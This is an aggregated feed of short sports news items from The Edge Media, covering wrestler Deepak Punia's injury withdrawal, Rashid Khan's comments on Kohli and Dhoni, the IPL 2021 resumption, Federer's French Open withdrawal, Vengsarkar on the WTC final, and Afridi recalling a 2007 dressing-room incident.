The post Due to hand injury, Deepak Punia pulls out of Poland open. appeared first on The Edge Media.
]]>Deepak Punia was to take mat for the 86kg event but forfeited his quarterfinal against American Zahid Valencia. It has been learnt that the 2019 World championships bronze-winner had suffered the injury two-three days before leaving for Warsaw during practice.
“He did not want to aggravate the injury and had informed the Federation that he will take a call on competing after reaching. After assessing his hand this morning, he decided not to take the mat,” a source in the Indian camp said.
The Wrestling Federation of India (WFI) confirmed the injury sustained by Deepak.”Yes, we have given him a choice. We do not want to put pressure on wrestlers, the Olympics are near, so no point in taking risks,” said WFI Assistant Secretary Vinod Tomar.
Punia will remain with the team till July 5 for the training camp that has been organised by the Polish Federation.
With Punia pulling out, only three Indians are now left in the competition.

Virat Kohli has great self – belief, said Afghanistan spinner Rashid Khan
Star Afghanistan spinner Rashid Khan feels the reason behind Virat Kohli’s batting success is that the Indian skipper never deviates from his process, irrespective of the quality of delivery bowled at him. The leg-spinner feels Kohli’s strong suit is that he has faith in his batting abilities and is not compelled into playing any shots he is not confident, giving due respect to the good balls. “If there is any other batsman, he will come under pressure if you bowl well to him. He will play a shot which is not his strength like a sweep, a slog sweep or any other different stroke,” Rashid said on the Youtube show ‘Cricast’
“[But] Virat will follow his own process. He goes with his mind. He has his own style and he goes with that. He doesn’t do anything different. I think that is why he is very successful. He has a process.
“He will respect good balls. He will punish loose balls. He has great self-belief. Some batsmen don’t have self-belief. That is why they struggle. He believes in his own strength,” Rashid added.
Rashid, who is a vital cog in the Sunrisers Hyderabad bowling attack in the Indian Premier League, is eager to play under the leadership of former India skipper Mahendra Singh Dhoni.
“I have dream that I play under MS Dhoni. Because the experience (of) playing with him, under him is very important. For a bowler, the role of wicketkeeper is very important and I don’t think there is anyone better than him to explain you things,” Rashid said.
Rashid also recalled the advise the veteran wicketkeeper-batsman gave him recently. “Every time after our matches, the discussions that I have with him has helped me,” Rashid said.
“Every time after our matches, the discussions that I have with him has helped me.“
Last time he told me ‘You have to be careful while fielding, you slide, throw the ball when it is not necessary, you get aggressive. Because there is only one Rashid and people want to see you more, what will happen if you get injured? Keep this in mind, I tell (Ravindra) Jadeja the same thing.’”
Rashid is also in awe of India’s white ball vice-captain Rohit Sharma’s ability with the bat and the extra second that he always has.
“I agree he has more time. He has got a lot of time. I have seen very few players who have a lot of time. It is natural for some players to have more time.
“The way he pulls even if it is 145 plus or 150 kmph, the way he hits, it seems the ball is 125 or 130 kmph. He has got great time. He doesn’t hit too many powerful shots. He believes in his timing.”
Rashid, who was a part of the currently-suspended IPL, is completing his quarantine ahead of the the Pakistan Super League (PSL), starting here on Wednesday.

The Board of Control for Cricket in India (BCCI) had suspended IPL 2021 due to a spike in the number of coronavirus cases inside IPL’s bio-bubble.
The Indian Premier League (IPL) 2021 is set to resume on September 19 while the final of the 14th edition will be played on October 15. The Board of Control for Cricket in India (BCCI) had suspended IPL 2021 due to a spike in the number of coronavirus cases inside IPL’s bio-bubble. After a lot of discussions, the board decided to shift the remaining matches to UAE due to the rise in the number of Covid-19 cases in India.
Speaking to ANI, a BCCI official confirmed that the tournament will resume on September 19 while the final will be played on October 15.
The discussions went really well and with ECB already giving us the oral nod to host the event ahead of the BCCI SGM, it was about closing the deal over the last week. The first game after the season resumes will be held on September 19 while we will have the final on October 15. The BCCI was always keen on a 25-day window to finish the remaining matches,” the official said.
With most of the overseas players back home, and with a packed calendar ahead, it remains to be seen how many overseas players can turn up for the remaining matches.
When asked about the availability of overseas players, the official added that the Indian board has kept its fingers crossed and talks are underway.
“The discussions have started and we are keeping fingers crossed that the foreign players will be mostly available. If a couple of them do not manage to turn up, we shall then decide on the future course of action. But keeping fingers crossed for now and hoping to have an action-packed end to the 14th edition in UAE,” the official said.
The official added that the overseas players form an integral part of the tournament and picking replacements for them would be a challenge if they do not turn up.
“Yes, if we do end up missing some of the foreign stars, that is an area which would need some attention when it comes to picking replacements as the foreign players are also integral to the teams. Team balance can go for a toss, so keeping fingers crossed on that one,” the franchise official said.
Prior to the suspension of IPL 2021, 31 matches were still left to be organised including the playoffs as well as the final, and the Board of Control for Cricket in India (BCCI) was actively looking for a window to conduct the remainder of the cash-rich tournament.

Roger Federer has withdrawn from the ongoing French Open. He was due back on court on Monday to tackle Matteo Berrettini for a place in the quarter-finals.
The Swiss maestro has decided to pull out from the ongoing French Open owing to multiple knee injury surgeries.
Roger Federer said Sunday he was withdrawing from the French Open despite having reached the fourth round, opting to focus on his primary objective of winning a ninth Wimbledon title.
Federer’s marathon four-set thriller win over Germany’s Dominik Koepfer helped him to move into the fourth round of the Grand Slam tournament for a record-extending 68th time. The 7-6 (5), 6-7 (3), 7-6 (4), 7-5 win saw Federer play the longest match in his career in the last 18 months, since the two surgeries on his right knee last year.
After discussions with my team, I’ve decided I will need to pull out of Roland Garros today,” the 39-year-old said.
“After two knee surgeries and over a year of rehabilitation it’s important that I listen to my body and make sure I don’t push myself too quickly on my road to recovery.
“I am thrilled to have gotten three matches under my belt. There is no greater feeling than being back on court.”

“The Roland Garros tournament is sorry about the withdrawal of Roger Federer, who put up an incredible fight last night,” tournament director Guy Forget said in a statement.
“We were all delighted to see Roger back in Paris, where he played three high-level matches. We wish him all the best for the rest of the season.”

World Test Championship Final : Former India Batsman Dilip Vengsarkar said a lack of match practice ahead of the final against New Zealand may hurt even the best players like Virat Kohli and Rohit Sharma.
Team India reached England on Thursday and headed into a three day quarantine in Southampton, the venue for the match that is from June 18.
Vengsarkar said that Kohli and Rohit are in very good form but lack of competitive time in the middle might affect their performance atleast in the tour opening WTC final.
Vengsarkar the former chairman of selectors , told PTI on Sunday : Well he (Kohli) has been around for a long time. He is one of the best batsman in world cricket at the moment. Players like Virat Kohli or Rohit Sharma , they are world class players, they take a lot of pride in their performance and pride in winning matches for India.”
“India is a better team and in good form. The advantage with New Zealand , it is a low profile team, the thing is that they are getting to play two Test matches before the Test match (WTC final), said Vengsarkar.
He further added “It is a good thing and both are in a very good form. But having said that , I think lack of match practice may hurt them in the first Test match that is what I feel.”

I did not have a hand in the incident, I only went in to save the situation when I saw Shoaib angry,” Afridi said on a video interview with Samma.
“Asif had sided with me in a joke which enraged Shoaib and all this happened. But Shoaib has a very beautiful heart, despite all the show of aggression he does. It’s natural for a fast bowler,”Afridi added.
Afridi was referring to the 2007 incident when reports surfaced that pacer Shoaib Akhtar had hit his teammate Mohammed Asif with a bat. The reports were confirmed later and Akhtar was called back from the 2007 ICC World T20 in South Africa.
